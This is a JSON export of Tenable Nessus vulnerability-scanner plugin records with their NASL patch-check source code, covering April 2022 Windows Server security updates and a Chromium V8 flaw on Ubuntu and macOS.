"nessus": [{"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012670. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-24484, CVE-2022-24538, CVE-2022-26784, CVE-2022-26831, CVE-2022-26915)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012670: Windows Server 2012 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26784", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012639.NASL", "href": "https://www.tenable.com/plugins/nessus/159682", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159682);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24550\",\n \"CVE-2022-26784\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012639\");\n script_xref(name:\"MSKB\", value:\"5012670\");\n script_xref(name:\"MSFT\", value:\"MS22-5012639\");\n script_xref(name:\"MSFT\", value:\"MS22-5012670\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012670: Windows Server 2012 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012670. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-24484,\n CVE-2022-24538, CVE-2022-26784, CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012639 or Cumulative Update 5012670\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012670',\n '5012639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012670, 5012639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012632 or cumulative update 5012658. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917, CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983, \tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26797, CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801, CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012632: Windows Server 2008 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012632.NASL", "href": "https://www.tenable.com/plugins/nessus/159684", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159684);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012632\");\n script_xref(name:\"MSKB\", value:\"5012658\");\n script_xref(name:\"MSFT\", value:\"MS22-5012632\");\n script_xref(name:\"MSFT\", value:\"MS22-5012658\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012632: Windows Server 2008 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012632\nor cumulative update 5012658. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916,\n CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917,\n CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983,\n\tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26797,\n CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801,\n CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012658\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012632 or Cumulative Update 5012658\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012658',\n '5012632'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012658, 5012632])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:42:32", "description": "The remote Ubuntu 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-5350-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-28T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS : Chromium vulnerability (USN-5350-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:chromium-browser", "p-cpe:/a:canonical:ubuntu_linux:chromium-browser-l10n", "p-cpe:/a:canonical:ubuntu_linux:chromium-chromedriver", "p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg", "p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg-extra"], "id": "UBUNTU_USN-5350-1.NASL", "href": "https://www.tenable.com/plugins/nessus/159243", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5350-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159243);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"USN\", value:\"5350-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Ubuntu 18.04 LTS : Chromium vulnerability (USN-5350-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the\nUSN-5350-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5350-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-browser-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:chromium-codecs-ffmpeg-extra\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '18.04', 'pkgname': 'chromium-browser', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-browser-l10n', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-chromedriver', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'},\n {'osver': '18.04', 'pkgname': 'chromium-codecs-ffmpeg-extra', 'pkgver': '99.0.4844.84-0ubuntu0.18.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser / chromium-browser-l10n / chromium-chromedriver / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:49:56", "description": "The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted 